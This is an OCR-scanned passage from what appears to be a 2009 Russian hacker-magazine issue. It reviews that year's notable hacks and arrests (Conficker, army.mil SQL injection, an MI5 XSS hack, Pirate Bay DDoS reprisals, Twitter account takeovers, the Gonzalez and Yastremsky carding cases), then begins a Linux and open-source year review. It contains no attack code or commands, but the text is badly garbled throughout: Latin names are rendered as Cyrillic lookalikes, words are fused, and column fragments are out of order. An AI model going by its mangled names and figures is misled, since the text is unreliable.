их паролях, вот некоторые из нихЧиск.Ьаскегз, 
ОІтпОг, Іиск.отд, іъек.ѵрз. Более сообразитель- 
ный Митникнедержал важной инфы в открытом 
доступе и отделался л ишь взломом личного 
блога, который был поднят на ѴѴогсІРгезз. 

Но чуваки из Хего іюгОѵѵпесІ не ограничились 
простым хаком экспертов и выложили все 
украденные данные в Сеть, опубликовав их в 
своем езине. «Утекли» все пароли, личная пе- 
реписка, логи чатов и многое другое. Никакой 
особенно интересной стехнической стороны 
информации там не было, что должно быть 
обидно вдвойне. 

Своей простой цели хакеры та к же достигли — 
показали всем миру, что уязвимы все, включая 
признанных профи, а самих профи в очередной 
раз выставили в неприглядном свете. 
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АНОНИМУСЫ КООРДИНИРУЮТ ДЕЙСТВИЯ В ІРС. 470 
СЕКУНД ДО АТАКИ НА САЙТЫ ІРРІ 




АДМИНЫ ПЕНТАГОНА 

Весной 2009 в США произошел забавный инци- 
дент. До сих пор не до конца понятно, кактакое 
возможно и не являются ли громкиезаявление 
американских военных «уткой». Впрочем, давай 
по порядку. 

В апреле сразу несколько источников в амери- 
канском правительстве поведали прессе, что 
неизвестные хакеры взломали сеть Пентагона и 
укралиу них из-под носа несколько терабайт ( !] 
данных по проектуЭоіпіБігіке РідЬіег. Вупомя- 
нутый проект по созданию истребителя-бомбар- 
дировщика пятого поколения Р-35 ЫдЫпіпд II, 
между прочим, было вложено 300 млрд, долларов, 
сумма оченьсолидная дажедля не испытываю- 
щих недостатка в финансировании американ- 
ских военных. Отофициальных комментариев 
Пентагон и компания вначале отказались, но 
военно-воздушные силы начали проводить 
расследование, тем самым подтверждая — ха к 
был. Чуть позже представители военных все же 
были вынуждены поговоритьс прессой. Они за- 
явили, что никакие данныеукрадены не были, и в 
очередной раззаверили весь мир, что взломать 
их сервера никому не под силу. Что ж, где здесь 
истина, мы вряд ли узнаем, зато можем сказать, 
что «неизвестных взломщиков», по некоторым 
данным, все же удалось отследить — ІР-адреса 
были китайские. Интересно и другое, — если не- 
сколько у кра де иных тера байт информации тоже 
правда, чем тогда занимаются на рабочих местах 
админы Пентагона? :) 

Раз уж мы заговорили о взломахамериканских 
военных, то нельзя не упомянуть о взломе сайта 
агтѵ.тіі . которому мы посвятили целую статью в 
мартовском номере пт . 

Как показывает практика, «мега-защищенные» 
сайты армии США совсем нетакстрашны на 
деле, как их малюют. Это лишний раз взялся до- 
казать наш други коллега 5кѵо2 и, как ни странно, 
доказал. 

Агту.тіі— ни много, ни мало официальный сайт 
армии США, который, казалось бы, должен быть 
прикрыт со всех возможных сторон, ведьжелаю- 
щих ломануть та кие ресурсы всегда хватает. На 
деле все оказалось куда прозаичнее: БкѵоАу без 
особого труда удалось проникнуть и в ОТЕ-сек- 



цию сайта, и в админкуАРМУЫЕѴѴЭ — модуль 
управления армейскими новостями, где он оста- 
вил на память админам парузаписей :). Вся атака, 
по сути, сводилась к50І_-инъекции и разведке 
административных директорий, что для такого 
крутого ресурса как-то совсем уж несерьезно. Все 
подробности и детали этого взлома ты можешь 
прочитать в 03 номере т за этот год. 

ЖИВУЧИЙ ЧЕРВЬ 

Настоящей головной болью 2009 года стал вирус 
известный какСопбскегака Ооѵѵпіоасіирака 
Кібо. Эпидемии, конечно, случаются каждый год, 
но единицам удается достичьтакой массовости. 
Появившись в конце 2008, червякзашагал по 
планете семимильными шагами, уже к началу 
2009 года заразив 1 2 миллионов компьютеров. 
Уязвимыми для червя являются все ОС семейст- 
ва М іеговой ѴѴіпсІоѵѵз, от2000-й доѴѴіпсіоѵѵ5 7 и 
ѴѴіпсІоѵѵ5 Зегѵег 2008 Р2. На машину СопГіскег 
попадает, используя дырку в Бегѵегзегѵісе, а 
также распространяется через ІІ5В-накопители, 
создавая файл аиЕогип.іпб и файл РЕСѴСІ_ЕО\ 
{5Ю}\РАЫВ0М_І\ІАМЕ.ѵппх. В системе чер- 
вякпроживаетв виде. сІИ-файла с именем из 
рендомного набора символов (например: с А 
ѵѵі п сі оѵѵзАзузІ; е тЗ 2\зі И ѵд 5 . сі 1 1.) . Попав в систему, 
хитрый мал варь отключает службу автомати- 
ческого обновления ѴѴіпсІоѵѵз, Бесигку Сепіег, 
Оеіюпсіег, ѴѴіпсІоѵѵз ЕггогРерогбпд и блокирует 
доступ ксайтам производителей всех известных 
антивирусов. 

Бороться сзаразой пришлось всем миром, для 
этого усилия объединили такие монстры как 
М іеговой, Ог.ѴѴеЬ, Е5ЕТ, Казрегзку ЕаЬ, Рапба 
Бесигку, Е-5есиге, АОЕ, САІ\ІІ\І, ІМеиБіаг, ѴегіЗідп, 
СІМІМІС итакдалее. Это неудивительно, — подан- 
нымтойже компании Е5ЕТ, на октябрь2009 года 
процентзаражения Сопбскег все еще составлял 
8.85%, то есть червь до сих пор является лидером 
всех вирусных рейтингов. Кому принадлежитав- 
торство и кто именно ответственен за написание 
живучего червя (Сопбскег имеетуже 5 версий — 
А, В, С, 0 и Е, соответственно] — неизвестно. Еще 
в начале 2009 года компания Місгозоб: назначила 
награду в размере $250.000 за любую информа- 
цию об авторах вируса, но, судя по всему, даже 



столь солидное вознаграждение на этот раз здесь 
не поможет. 

СУЕТА ВОКРУГ ШР 

Менее глобальные в общемировом масштабе 
(зато очень неприятные для всех российских 
юзеров] вещи весь 2009 год происходили вокруг 
мессенджера 01 Р. 

Для начала в настройках новых версий 01 Р 
Іпбпит появилисьдве галочки, включенные по 
умолчанию: «хранить настройки моихучет- 
ныхзаписей на сервере» и «хранить пароли 
моихучетныхзаписей на сервере». Ктомуже, 
выяснилось, что мессенджер сохраняет историю 
]аЬЬег-переписки на сервер, вообще об этом не 
спрашивая. Затем произошел взлом официаль- 
ного сайта мессенджера — дір.ги и блога глав- 
ного разработчика. Кто был ответственен за хак, 
неизвестно, и до сих пор неясно, ограничилось 
тогда все банальным дефейсом и взломом фо- 
румов, или хакеры все же смогли добраться идо 
более ценной информации. Почти целый вечер 
и ночь всежелающие могли беспрепятственно 
наблюдать за увлекательным матерным чатом 
хакеров друг с другом и садминами сайта прямо 
на его главной странице. Самое интересное, что 
никаких официальных комментариевтаки не 
последовало, только попавший под раздачу экс - 
разработчикОІР’а I пб уверял, что базы и пароли 
никуда неутекли и извинялся за всех. 

Но базы, пусть нес паролями, а с е-таіі адре- 
сами цір-юзеров в Сеть все-таки просочились, 
правда, неповине хакеров. Сами разработчи- 
ки ОІР допустили халатность, когда поднимали 
новый сервис аатез.дір.ги . Они умудрились 
не заметить, что, зайдя на форум да 
и нажав на кнопочку «пользователи», можно 
легко и легально увидеть все ники и е-таіГы 
юзеров. Всего в Сети оказалось 160.694 
адреса, и, хотя эту дырку довольно оперативно 
закрыли, предприимчивая сетевая публика, 
разумеется, успела сохранить все, до чего 
сумела дотянуться. И вновь никаких офи- 
циальных извинений или комментариев не 
последовало, на этот раз в частном порядке за 
всех извинялся один из ведущих разработчи- 
ков ОІР — 5еда-2его. 
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СЦЕНА 




НУТРО МІ5 

О взломахамериканских военных 
мы уже рассказали выше, а теперь, 
чтобы другим не было обидно, 
расскажем и о них. Например, госу- 
дарственное ведомство британской 
контрразведки МІбтакже подверг- 
лосьуспешной атаке в этом году. 
Хак-группаТеат ЕІіТе, известная 
своими атаками на Всемирную 
организацию здравоохранения 
и платежную систему Ѵіза, в июле 
2009 добралась и до сайта МІ5. 
Воспользовавшисьуязвимостью в 



мнение, противники копирайтов не 
гнушались и хакерских методов. 
Доподлинно известно, что после 
вынесения админам ТРВ обвини- 
тельного приговора была проведена 
своего рода карательная операция, 
носившая имя «Вауіоиі». Несколько 
тысяч анонимусов-акти вистов зава- 
лили ВОоЭ’ом сайты ІРРІ (Между- 
народной федерации грамзаписи) 
Ирі.огд . Ирі.сот и Ирі.зе .атакже 
сайт юристов, выступавших в суде 
на стороне обвинения — тіадз.сопп . 
Помимо этого анонимусы призывали 



действий всем, начиная от команды 
трекера, будеттолькохуже. 

Кстати, в связи сТЬе РігаТе Вау стоит 
упомянуть и еще один инцидент, ко- 
торый вообще можно назвать самым 
настоящим ІЛе баск. Один из админов 
ТРВ — Готфрид С вартхольм — 
известен миру какпареньнероб- 
кого десятка: именно он отвечал на 
гневные письма правообладателей, 
не скрывая сарказма и ехидства, а 
потом выкладывал все это по адресу 
ІберігаІеЬаѵ.ога/ІеааІ . Очередная 
инициатива Свартхольма оказа- 
лась не менее хулиганской — он 
предложил устроить своеобразную 
ОБоЗ-атаку на адвокатскую фирму 
0апоѵѵ5ку& Рагіпегз, которая защи- 
щала интересы медиа-магнатов в 
ходе процесса. 

Готфрид призвал народ, в знак 
«огромной признательности» этим 
людям, перевести на их банковский 
счет 1 шведскую крону. Вся соль в 
том, что послетысячи платежей банк 
начал взиматьс фирмы комиссию 
за каждый последующий платеж, 
в размере 2 крон. Болеетого, 
обработка таких «поступлений» в 



ОБНАЛИЧИВ ДОМА НАСТЬ СУММЫ, ПАРЕНЬ 
ОТПРАВИЛСЯ В РОССИЮ. СОБИРАЯСЬ ОФОРМИТЬ 
ЗДЕСЬ НУЖНЫЕ ДОКУМЕНТЫ. А ЗАТЕМ БЕЖАТЬ В 
ЕВРОПУ НА ПМЖ. 



поисковом движке, который удалось 
вскрыть при помощи іГгате-иньек- 
ций и Х55-атак, хакеры добрались 
до нутра тіб.аоѵ.ик . Вся соль в том, 
чтоТеат ЕІіТе вполне могли сделать 
при этом скриншоты контента и 
впоследствии использовать их в 
классическихфишинговых целях. 
Междутем, неизвестно и сумели ли 
Теат ЕІіТе добраться до каких-либо 
секретных данных МІ5, или же все 
ограничилосьтолько образцово-по- 
казательным вскрытием поискового 
движка. Официальноутечкусекрет- 
ных данных, конечно, все отрицают, 
но мы-то знаем, что официальные 
комментарии нередколишьхоро- 
шая мина при плохой игре. 

МЕСТЬ ЗА КОПИРАЙТ 

Сразу ряд взломов и атак в этом году 
был связаны с неутихающей войной 
между анти пирата ми и сторонника- 
ми свободы информации. Громкий 
суд по делу ТЬе Рігаіе Вау сильно 
взбаламутил воду не только в самой 
«Пиратской Бухте», но и в Сети 
в целом, так что, отстаивая свое 



всех неравнодушных слать в МРАА 
(Ассоциацию кинокомпаний Амери- 
ки) и МА05 черные факсы. Конечно, 
называть кучку школьников с имей- 
джборд«хакерами», это несколько 
чересчур, особенноучитывая, что 
большинство вовлеченных в опера- 
цию сделали это, что называется «іог 
ІиІ 2 ». Однако атака удалась, сайты 
лежали, и на это обратили внимание 
СМИ. Свое неудовольствие «сетевая 
общественность» выразила и была 
услышана. 

Однимилишьанонимусамидело, 
впрочем, не ограничилось, были и 
другие атаки. Например, чуваки, под- 
писавшиеся йеп Ыуа Сепегабопеп, 
хакнули шведский филиал ІРРІ ( трі. 
зе), заменив главную страницу сайта 
посланием, в котором копирастов 
обвиняли во лжи, а общественность 
призывали кбойкотуи линчеванию 
виновников недавнего «судебного 
торжества». Возможно, атак было 
бы и гораздо больше, если бы один 
изадминовТРВ, Питер Сунде, не 
обратился к на роду с просьбой 
оста н о в иться , за м ети в , что от та ки х 



адвокатской конторе осуществляет- 
ся вручную и сопряжена с маранием 
кучи бумаг, а штатфирмы совсем 
небольшой. Но Свартхольму и этого 
показалось недостаточно. Особо 
ретивым борцам за справедливость 
он предложил отозвать свой пере- 
вод обратно! Свою месть Готфрид 
окрестил просто — «распределен- 
ной атакой на отказ в долларах» или, 
сокращенно, ООо$-атакой. 

ХАКИ ТѴѴІТТЕР’А 

Конечно, не остаются без внимания 
хакеров и социальные сети — на 
этом поле работают и фишеры, 
и наемники, и обычные сетевые 
хулиганы. 

Больше всего в уходящем году 
доставалось, пожалуй, молодому 
ижутко популярному сервису для 
микроблоггинга ТѵѵіНег. В начале 
2009 года хакеры взломали аккаунты 
сразу ряда знаменитостей, среди 
которых был президент США Барак 
Обама, Бритни Спирс, блоги телека- 
нала Еох Ыеѵѵз и сервиса ЕасеЬоок. 
Всего тогда пострадало 33 акка, и, 




ДЕН КАМИНСКИ 



по информации компании Эорбоз, 
ответственность за это лежала на 
подростке с ником СМ2, который 
сумел получить доступ к админ- 
ке Тѵѵі Не г. В админку взломщик 
проник, подобрав парольодного из 
сотрудников, благо, пассвордбыл 
несложный — «счастье» (Ьарріпезз). 
Однако, по информации всетехже 
Борбоз, гадостей от имени звезд ха- 
кер не писал, он просто слил в Сеть 
пароли отугнанныхаккаунтов :). 
Более серьезный и не менее 
громкий хакТѵѵіНег приключился 
летом 2009. На этот раз взломали 
почтужены исполнительного 
директора Тѵѵіііег Эвана Уильямса, 
а также ящик одного из админов. 
Утечка вышла куда глобальнее, в 
Сеть попали конфиденциальные и 
финансовыедокументы компании, 
среди которых были банковские 
реквизиты сотрудников, штатное 
расписание суказанием зарплат 
персонала, резюме от претендентов 
итакдалее. «Благодарить» за это 
в ТѵѵіМег, судя по всему, должны 
француза, скрывающегося под 
ником НаскегСгоІІ — у себя в блоге 
он описал подробности взлома и 
выложил скрины админки. 

АРЕСТЫ И ГРОМКИЕ ДЕЛА 

Удачные и громкие взломы, это 
конечно, интересно, но не всем 
удается выйти сухими из воды — 
киберпреступников нетакуж редко 
ловят, судят и приговаривают. В 
свете этого, рассказать о ха ках, но 
умолчать о наиболее ярких и зна- 
чимых арестах и судах прошедшего 
года было бы не совсем правильно. 
Без тени преувеличения можно 
сказать, что 2009 год прошел под 
знаком гонений наторрент-трекеры, 
а наиболее громким делом года стал 
суд над командой ТЬе РігаТе Вау. 
Самому процессу над Готфридом 
Свартхольмом (ОоШгісІ ЭѵагТбоІт 
ака «апакаТа»), Фредериком 
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АДМИНЫ ТРВ — ГОТФРИД СВАРТХОЛ ЬМ (СЛЕВА) И ПИТЕР СУНДЕ 



Нейжем (Ргесігік Ыеу ака «ТіАМО»), 
Питером Сунде Колмисоппи [Реіег 
Зипсіе Коітізоррі ака «Ьгокер») 
и Карлом Лундстремом (Сагі 
ЕипсШгот) мы посвятили отдель- 
ную статью, а за происходящими 
вокруг сайта событиями продолжа- 
ем наблюдать до сих пор. 
Перечислить все перипетии, через 
которые ТРВ прошел за год, просто 
невозможно — слишком много их 
было: суды с анти пирата ми всех 
мастей, обвинительный приговор в 
Швеции, скандалы, попытки копи- 
растов блокироватьТРВ обходными 
путями, переезды, неувенчавшаяся 
успехом попытка продать трекер и 
так далее, далее, далее. 

Однако, несмотря на происходя- 
щее, скандальный ресурс до сих 
пор продолжает работать, а вся его 
команда по-прежнему на свободе, 
хотя, напомним, каждому из ребят 
дали по годутюрьмы. Пиратская 
партия Швеции, благодаря шумихе, 
поднятой вокруг процесса, сумела 
пройти в Европарламент, получив 
там целыхдва кресла. И главное — 
правообладатели пока неувидели 
отТРВ ни цента. В итоге получается, 
что, невзирая на обвинительный 
приговор и негодованиеантипи- 
ратов всего мира, этот раунд все же 
остается за ТЬе Рігаіе Вау. 

Еще одно громкое разбирательство 
2009 года состоялось в США, где 
власти «накрыли» с поличным 
кардеров. Альберта Гонсалеса ака 
зедѵес ака зоирпагі ака ]4диаг1 7 
арестовали еще в 2008 году, но 
подробности начинают вскрываться 
только сейчас. 

28-летнему жителю Калифорнии 
предъявили 1 9 обвинений, в числе 
которых значились кибермошенни- 
чество, хищение личных данных при 
отягчающих обстоятельствах, сговор 
с целью мошенничества и многое 
другое. Дело втом, что Гонсалес, по- 
хоже, самый «крупный» пойманный 



кардер за всю историю США— Гон- 
салеса и его сообщников обвинили 
в краже 130 млн. номеров кредитных 
и дебетовых карт. От действий 
предприимчивых кардеров постра- 
дала платежная система Неаіііапсі 
РаутепШузІеппз, национальная 
сеть магазинов 7-ЕІеѵеп, сеть 
супермаркетов НаппаіогсІ Вгобзегз и 
многие другие. Ворованные номера 
Гонсалес и компания продавали. 
Сообщники «мега-кардера», кстати, 
по некоторым данным, проживают 
в России. Но, какбыто ни было, 
отдуваться за всех придется именно 
калифорнийцу, он полностью 
признал свою вину, и теперь его 
ждеттюремный срокот15до25лет, а 
также штраф размером почти 3 млн. 
долларов и конфискация имущества. 

ЕРІСРАИ 

Между тем, у наших хакеров запро- 
сы скромнее, но и фэйлы гораздо 
эпичнее. Таклетом 2009 года в 
Москве задержали казахстанского 
«кибер-гения», который взломал на 
родине банковскую сеть и перевел 
с чужого счета на свой более мил- 
лиона долларов. Обналичив дома 
часть суммы, пареньотправился в 
Россию, собираясьоформить здесь 
нужные документы, а затем бежать 
в Европу на ПМЖ. В это время в 
Казахстане взломщика вычислили и 
объявили в розыск, а он.добрав- 
шисьдо Москвы, не придумал 
ничего лучше, как попытаться об- 
наличитьоставшуюся часть суммы 
через банкоматы и банковские фи- 
лиалы. Счет, конечно, уже оказался 
заблокирован, а несостоявшегося 
иммигранта арестовали прямо в 
одном из столичных банков, так как 
он упорно «продолжал пытаться». 
Теперь вместо вожделенной Герма- 
нии чувака ждетуголовное дело по 
статье 159 УК РФ «мошенничество». 
Мало кто не слышал имени Максима 
Ястремского, которого западные СМИ 



успели окрестить чуть л и не крестным 
отцом кардерских синдикатов и 
мега-хакером. Украинец Ястремский 
ака Макзікдолго разыскивался 
западными спецслужбами в связи 
с кражей и продажей номеров кредит- 
ных и дебетовых карт, на которой 
он заработал 1 1 млн. долларов (ему 
приписываютугон порядка 40 млн. 
номеров). Кстати, спецслужбы США 
связываютЯстремского с Гонсалесом, 
о котором речь шла чуть выше, по их 
мнению, Макзік входил в преступную 
группу, которой руководил Гонсалес. 
Но задержали Ястремского вовсе не 
в США, а в Турции еще в 2007 году, 
куда он прилетел отдыхать. Согласно 
официальной информации, тогда 
при нем был ноутбук, на котором 
обнаружились данные о почти 5.000 
ворованных карточек. В целом, 
Макзікссообщниками взломали 12 
турецких банков, систему ИХ, Вагпез 
& ІЧоЫе, Еогеѵег21, ОВѴѴитакдалее. 
И хотя ущерб, нанесенныйтурецким 
банкам, составил всего $23.200, 
отдавать хакера американцам турки 
отказались. Весной 2009 года по делу 
Ястремского, наконец, состоялся суд, 
и кардера приговорили кЗО годам 
тюрьмы. В Турции. Ехать отдыхать 
в страну, у которой есть договорен- 
ность о сотрудничестве с правоохра- 
нительными органами США, когда, 
ктомуже, находишься в междуна- 
родном розыске, очевидно, было не 
самым лучшим решением. Стоили 
эти миллионы 30-ти лет втурецкой 
тюрьме или нет, пожалуй, только 
самому Макзік’у и известно {лпц, 
всей редакцией сочувствуем 
чуваку, — Прим. ред.). 

КОММЕНТАРИЙ 
ПАВЛА ПРОТАСОВА 

И взаключение, мы решили 
обратиться кспециалисту в области 
права и поинтересоваться его 
мнением относительно наиболее 
значимых юридических прецеден- 
тов уходящего года. В частности, 
было интересноузнатьо проис- 
ходящем в России, хотя нам пока 
и далеко до западного размаха 
гонений на пиратов, кардеров и 
иже с ними. Комментарий любезно 
согласился дать Павел Протасов — 
хорошо известный в рунете юрист и 
журналист, положивший немало сил 
на просвещение нашего іТ-шного 
брата в области юриспруденции. 
Кстати, поздравляем Павла — 
совсем недавно он успешно отсудил 
у незабвенного РАО («Российское 
Авторское Общество») право на 
существование домена апГгао.ги . в 
котором РАО попыталось усмотреть 



оскорбление в свой адрес. 

По по воду уходящего года Павел 
поведал нам следующее: «Как 
мне кажется, наиболеезначимы- 
мив2009 году были событиями в 
сфере гражданского, а неуголовного 
права. Прежде всего, это серия 
исков, поданных РАО «в защиту прав 
авторов». У меня имеются основания 
полагать, что это —только начало: 
судиться «Российское авторское 
общество» будет и дальше. Еще 
одно важное событие — принятие 
пленумами Верховного и Высшего 
арбитражного суда совместного 
постановления, посвященного 
вопросам применения Четвертой 
части ГК [четвертая часть ГК 
напрямую затрагивает вопросы 
авторских прав и их наруше- 
ния. О принятии постановле- 
ния мы уже писали , и об этом 
гудел весь рунет, — Прим. МіітіЩ. 
Крометого, имели место несколько 
«знаковых» судебных процессов из- 
за использования произведений в 
интернете. По этим процессам можно 
судить о том, как будет развиваться 
практика в дальнейшем. Прежде 
всего, интересно решение потак 
называемому«делумастерхоста»и 
сайта «зайцев. нет» (« мастерхост » 
пытались привлечь к ответст- 
венности за размещенные на 
хостящемся у них каусеѵ.пеі 
музыкальные треки, — Прим. 
МіЕгіІІ). Постановление было вынесе- 
но в декабре прошлого года, ноопуб- 
ликованотолько в этом году. Совсем 
недавно прошел еще один похожий 
процесс, по делу «Рамблера», кото- 
рыйтакже хотели привлечь к ответс- 
твенности за ролик, размещенный 
одним из пользователей. В обоих 
случаях суды отказали втребованиях 
истцов о привлечении кответствен- 
ности хостеров за произведения, 
размещенныеу них пользователями. 
Думаю, и в дальнейшем судебная 
практика будет развиваться похожим 
образом, и судам все-таки придется 
устанавливать, кто же на самом деле 
совершал действия по использо- 
ванию произведения, а кто просто 
предоставлял для этого техническую 
возможность. Хостер может быть 
привлечен к ответственности только 
после предупреждения о незакон- 
ном размещении у него контента, 
в том случае, если не удалит 
его. Дело втом, что в последнее 
время распространились иски, 
авторы которыхтребуют денег 
нес тех, кто совершил право- 
нарушение, а с тех, кого легче 
достать. Надеюсь, суды пресекут 
подобную практику», т 
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ІШІХОЮ 



I ЮРИИ «АОЕРТ» ВИДИНЕЕВ АОЕРТбгаеМАІ!.. 



и будущего 



прошлого 



Обзор основных достижений в мире ОрепЗоште 
за прошедший год и попытка заглянуть в будущее 



Наверняка тебе, как и мне, часто приходилось слышать мнение, что І_іпих 
— самая быстроразви вающаяся ОС в мире. Атак как в конце года приня- 
то подводить итоги, то предлагаю оценитьтемпы развития Ыпих (а также 
других основных ОрепЗоигсе-проектов) за год и постараться заглянуть в 
грядущее, гадая на гоабтар’ах. 



Уходящий год оказался богат не только на 
интересные релизы, но и на круглые даты. 

В сентябре проекту ОЫІІ стукнуло 25 лет, в 
августе ядро І_іпих достигло совершенноле- 
тия, и в том же месяце ІІпіх праздновал свой 
очередной юбилей — 40 лет. 

ядра— чистый ИЗУМРУД 

Основная частьлюбой операционной системы 
— это ядро. За прошедший год ветка 2.6 ядра 
Ыпих пережила 3 релиза (2.6.29, 2.6.30 и 2.6.31]. 
И переживетеще один в декабре (2.6.32), если 
все пойдет по плану. 

Суммарно в версиях 2.6.29 — 2.6.31 к ядру 
добавили околотрех миллионов строк кода, 
изменения затронули практически все подсис- 
темы ядра. Количество нововведений плохо 
соотносится с размером статьи, поэтому опишу 
лишь основные и, на мой взгляд, интересные: 

1. Технология КМ5 (кегпеі тобе зеІТіпд], 
позволяющая менять видеорежимы средст- 
вами ядра. Поддерживаются видеокарты от 
Іпіеі, АТІ/АМО вплоть до Ьб4ххх/г700 (только 
с открытыми дровами) и пѴібіа (только с дро- 
вами поиѵеаи]. Кроме того, что технология — 



великое благо для разработчиков ядра и X1 1 , 
она дает плюсы и простым пользователям: 
позволяет запускать X1 1 не от рута, обеспе- 
чивает более плавное переключение между 
пользовательскими аккаунтами и между XII и 
виртуальными терминалами. 

2. Новые файловые системы: 

• ВМб — разработанная с нуля ФС, по своим 
функциональным возможностям близкая к2Е5: 
снапшоты, компрессия, динамическая дефраг- 
ментация, журналирование ит.д. Последняя 
на данный момент версия данной ФС — 0.19 — 
явно указывает на то, что пока использовать ее 
стоиттолько в целяхтестирования. 

• ЗдиазЫъ — ФС, обеспечивающая очень вы- 
сокое сжатие данных, но предоставляющая до- 
ступ в режиме «только для чтения». Основные 
области применения — всевозможные ЫѵеСО и 
встраиваемые устройства. И хотя в этих облас- 
тях ФС уже успешно используется пару лет, в 
основную ветку ядра она была включена только 
в версии 2.6.29. 

• N16352 — устойчивая ксбоямжурналь- 
но-структурированная ФС. Данные хранит 
в подобной логам структуре, поддерживает 



версионность: позволяетпри смонтированной 
в режиме «чтение-запись» ФС смонтировать 
любое из ее предыдущих состояний в режиме 
«только для чтения». 

• Р0НМЕІ_Р5 — несмотря на шуточное назва- 
ние, это довольно серьезная высокопроизво- 
дительная сетевая ФС, в перспективе более 
быстрый и функциональный аналог N65. 

• беѵітріъ (или Оеѵіъ 2.0) — виртуальная 
файловая система /беѵтеперь создается в 
ОЗУ через Ітріъ, что позволяет получить к ней 
доступ еще до монтирования корня. 

3. Поддержка новых протоколов: 

• ѴѴіМАХ. 

• 802.1 1 ѵѵ — протокол безопасной передачи 
управляющей информации в беспроводных 
сетях. Стандарт пока не утвержден, существует 
только в виде черновика. 

• РОЗ (ПеІіаЫе ОаФдгат Зоскеіз] — протокол 
предназначен для высокоскоростного обмена 
данными междуузлами в кластере. 

• ІЕЕЕ 802.1 5.4 — протокол описывает низкос- 
коростную (до 250 Кбит/с) беспроводную сеть 
и предназначен для общения между собой 
всевозможных датчиков. 
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• 115В 3.0 — новая версия старого доброго 
115В, увеличивающая теоретическую пропуск- 
ную способность до 4,8 Гбит/с. 

Версия 2.6.32 ядра станет самой революци- 
онной версией за последние парулет, как 
минимум — ведь в эту версию войдет код от 
МісгозоН :). 

ОТКУДАДРОВИШКИ? 

Не все дрова для І_іпих содержатся в ядре, 
некоторые производители выпускаютсвои 
закрытые (проприетарные] версии. Самый 
распространенный пример — дрова для 
видеокарт от известных производителей: АМ О 
и пѴібіа. 

АМБ выпускает новый релиз своих закрытых 
дров Саіаіузі: каждый месяц. Новые функции 
добавляются сравнительно редко, в основ- 
ном багфиксы (а багов в дровах пока еще 
достаточно] и официальная поддержка новых 
дистрибутивов. 

Итак, прогресс дров Саіаіузі: отАМБ за этот 

ГОД: 

• Полная поддержка ОрепСІ_3.0. 

• Частичная поддержка РапсІВ 1 .3. 

• Поддержка НуЬгісІ СгоззЕіге — технологии, 
позволяющей объединить мощность несколь- 
ких неидентичных 6 РСІ (например, встроенной 
и внешней]. 

• Поддержка МиШѵіеѵѵ — технологии, позво- 
ляющей использовать несколько дисплеев на 
нескольких видеокартах. 

В 2009 году пѴісІіа выпускала дрова в трех 
ветках: 180.x, 185.x и 1 90.x. В основном, в 
сбапдеіод’ах встречались багфиксы и добав- 
ление поддержки новых СРІІ/ядер/Х.огд. 
Ключевые изменения в дровах пѴісІіа за год: 

• Полная поддержка ОрепСІ_3.2. 

• Множественныеулучшения втехнологии 
ѴОРАІІ, позволяющей возложить на СРІІ 



нагрузку по декодированию видео. 

Но главным трендом уходящего года, связан- 
ным с ОРИ, стала, несомненно, технология 
ОрепСБ. ОрепСІ_ — реализациятехники 
6Р6РІІ, позволяет перекладывать на СРІІ 
вычисления, которые обычно производятся 
СРП. Стандарт 0 репСІ_ был разработан в 
качествезамены аналогичных решений от 
производителей видеокарт (пѴісІіа СІЮА, АМР 
51хеат], поэтому написанная с использовани- 
ем ОрепСБ прога будет работать на видеокарте 
любого производителя, драйвера которой под- 
держивают 0 репСІ_. Даешь стандартизацию! 

БЛИЖЕ К ПОЛЬЗОВАТЕЛЮ 

Весьуходящий год нетолько кернел-хакеры 
работали, не покладая рук. Разработчи- 
кам более приближенных к пользователю 
приложений тоже есть, чем гордиться. Взять, 
например, окружения рабочего стола. За 2009 
годдевелоперами самых болыших«противо- 
борствующих» лагерей было выпущено по 2 
мажорных релиза. 

Основные новшества Споте 2.26 и Споте 
2.28: 

• Поддержка аутентификации с помощью 
сканера отпечатков пальцев. 

• Упрощена настройка многомониторных 
конфигураций. 

• Значительно расширены возможности стан- 
дартного модуля ВІиеІооіЬ. 

• Прога для записи дисков Вгазего вошла в 
состав Споте. 

• Еѵоіибоп стал на шагближе к М5 ОіЖоок: 
теперьон понимает Р5Т и умеетобщаться с М5 
Ехсбапде 2007. 

• Регулятор громкости интегрирован с модным 
РиІзеАисІіо. 

• Множествоулучшений вТоІет: наконец-то 
он научился воспроизводить видео с места 



последней остановки. 

Согласен, сбапдеіод выглядит не особо 
внушительно. Но это не значит, что проект 
останавливается в развитии — просто вовсю 
идет работа над релизом новой ветки 3.0. Про 
грядущую версию (должна выйти во втором- 
третьем квартале 2010] известно немного. 
Точно будут использоваться две ключевые 
технологии: 

• Споте 5 И е II — рабочее окружение, предо- 
ставляющее новый способ запуска приложе- 
ний, управления окнами и доступа к докумен- 
там. Словами это описать сложно, лучше один 
раз увидеть: ШрУЛіѵе.дпоте.огд/СпотеЗЬеЦ/ 
Всгеепсазіз . 

• Споте Хеіідеізі — технология, которая ре- 
гистрирует действия пользователя (созданные 
в процессе работы файлы, посещенные сайты, 
почтовые и ІМ сообщения) и сохраняет их в 
хронологическом порядке. Это позволяет не 
только быстро просмотреть историю, но и легко 
найти любой созданный файл. 

Также известно, что Споте 3 будет использо- 
вать новую версию библиотеки Сік+З. 

Релиз КБЕ4 не все поклонники этой графичес- 
кой среды восприняли сэнтузиазмом (Линус на- 
столько расстроился, что перешел на Споте :]]. 

И было, отчего расстроиться: релиз 4.0 сложно 
назвать стабильным, тянет разве что на альфа- 
версию. Ктомуже, сломали совместимость 
со старыми приложениями. Не упали духом, 
пожалуй, только разработчики: они продолжили 
упорно устранять баги и добавлять новые фичи. 
Результатом года кропотливого труда стали 
релизы 4.2 и 4.3 (а также минорные релизы 4.2.1 - 
4. 2. 4 и 4. 3.1 -4. 3.3]. Основные нововведения: 

• Интегрирование РоѵѵегОеѵіІ— мощного 
средства управления питанием. 

• Интегрирование РоІісуКН — системы для 
более гибкого управления привилегиями. 

• Улучшения в интерфейсе Ріазта: новая 
система уведомлений, новая тема Аіг, возмож- 
ность группировки приложений на панели 
задач, автоскрытие панели и многое другое. 

• В Кѵѵіп добавлены новые эффекты и пе- 
реработан интерфейс в сторонуупрощения 
настройки. 

• Возможность запускать команды под учетной 
записью другого пользователя. 

• Несколько десятков новых плазмоидов. 

• Новый, более гибкий, системный трей. 
Следующий релиз (4.4] намечен на январь 
2010. Он принесет следующиеулучшения: 

• Будет базироваться на СИ: 4.6. 

• КасИгеззВоок будет полностью переписан — 
обзаведется новым интерфейсом и интеграци- 
ей с Акопасіі (хранилище данных для записных 
книжек, органайзеров, будильников и других 
РІМ-приложений). 

• Интерфейс Ріазта будетоптимизирован для 
экранов нетбуков. 
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• КАіЛЬ — средство, предоставляющее единое 
